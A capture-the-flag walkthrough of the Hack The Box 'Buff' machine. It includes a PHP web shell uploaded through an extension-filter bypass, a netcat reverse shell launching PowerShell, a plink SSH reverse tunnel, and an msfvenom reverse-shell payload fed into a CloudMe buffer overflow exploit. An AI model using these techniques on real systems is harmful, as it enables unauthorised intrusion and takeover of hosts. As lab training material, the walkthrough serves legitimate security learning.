This is a write-up on the Buff machine access challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user egotisticalSW for creating the challenge.

Buff was a fun challenge that covers basic application security with traditional buffer overflow attacks.  It's an easy challenge and good for beginners or anyone returning CTFs after a long hiatus.

Reconnaissance

Start with a basic nmap, revealing a web server on port 8080 (any other open ports are not related).

    nmap -Pn -p- 10.10.10.198

Browsing the website reveals the underlying software to be a gym management system published by ProjectWorlds.  The version in use contains exploitable vulnerabilities published on exploit-db.

Getting User

Following the details of the exploit and leveraging the built in upload script upload.php, it is possible to upload arbitrary files.  Start by creating a php script that can perform remote execution on the web server.  

    <?php echo shell_exec($_GET["telepathy"]); ?>

This script will remotely execute any command passed to it in the telepathy parameter of the http request.  Although the file will ultimately be called exec.php, name it exec.php.png. This is required to bypass filters in upload.php, which under normal circumstances allows only certain file types, such as images, to be uploaded.

Create a local html webpage with the code below. This is a simple way to exploit the vulnerability without the need for additional tools.

    <form action="http://10.10.10.198:8080/upload.php?id=exec" method="post" enctype="multipart/form-data">
      Select image to upload:
      <input type="file" id="file" name="file">
      <input hidden name="pupload" value="upload">
      <input type="submit" value="Upload" name="submit">
    </form>

Open the local html page in a web browser, select the file exec.php.png for upload and click the upload button. Once the file has uploaded, it should be possible to execute remote commands.  Test by browsing to http://10.10.10.198:8080/upload/exec.php?telepathy=whoami.  It will display "shaun" which is the the id of the web server user.  Obtain the user flag by browsing to http://10.10.10.198:8080/upload/exec.php?telepathy=type c:\users\shaun\desktop\user.txt.

Repeat the process to upload Windows binaries of nc.exe and plink.exe, which will be required later on. Make sure each is a standalone binary, not an MSI, and confirm the upload by browsing to http://10.10.10.198:8080/upload/exec.php?telepathy=dir. On the web server, the files will be located in C:\xampp\htdocs\gym\upload.

Getting A Reverse Shell

Start by preparing a local listener which the reverse shell can connect back to. Netcat works best for this.

    nc -lnvp 1234

Browse to http://10.10.10.198:8080/upload/exec.php?telepathy=C:\xampp\htdocs\gym\upload\nc.ex <LOCAL IP> 1234 -e powershell.exe and a powershell prompt will appear in the terminal running netcat.

Enumeration

Standard enumeration should be easier with a reverse shell.  The first important discovery is the CloudMe service executable, found in C:\Users\shaun\Downloads\CloudMe_1112.exe, which is vulnerable to buffer overflows.  The other important find is that the service, which normally runs on port 8888, is only bound to the localhost interface. This means the service cannot be accessed from any other device. (This is discovered by running netstat -an | findstr "8888" which returns 127.0.0.1:8888 as the local address and a state of LISTENING).

Start Tunneling

Its not possible to expose the CloudMe service directly on the public network interface, but it is possible to create a tunnel from an outside device (e.g. the attacker workstation) into the server and access the service that way.

Create an account called attacker on the attacker workstation. Make sure that ssh is enabled and the attacker user can login remotely.  Plink is an SSH client and can be leveraged tunnel traffic into the webserver. From the reverse shell, run the command:

./plink -l attacker <LOCAL IP> -N -R 8888:127.0.0.1:8888

After login, the attacker workstation will have a listener operating on port 8888 which forwards traffic through the tunnel to the webserver and from there to 127.0.0.1 port 8888.  Inotherwords, connections to port 8888 on the local machine will be directed to the CloudMe service running on the webserver.

Prepare The Attack

The exploit used on the CloudMe service is a python script found on exploit-db. Download the exploit and save as 44470.py.

Run the command below to create new bytecode for the payload. Copy the bytecode in the script with the results of the command, replacing the existing bytecode.  Note that LPORT must match the port number used when opening a listener with netcat in later steps.

msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL IP> LPORT=1236 -f c

Buffer Overflow

Using netcat, open a new local listener which will be used for an administrative reverse shell.

    nc -lnvp 1236

In a separate window, run the exploit.

python 44470.py

A DOS command prompt, running as the Adminisistrator user, will open in the netcat listener.  The bytecode has been sent to the CloudMe service and has caused a buffer overflow and executed the payload, which are instructions for opening a reverse shell to the listener.

Obtain the root flag with the command type c:\users\administrator\desktop\root.txt. in the Administrative reverse shell.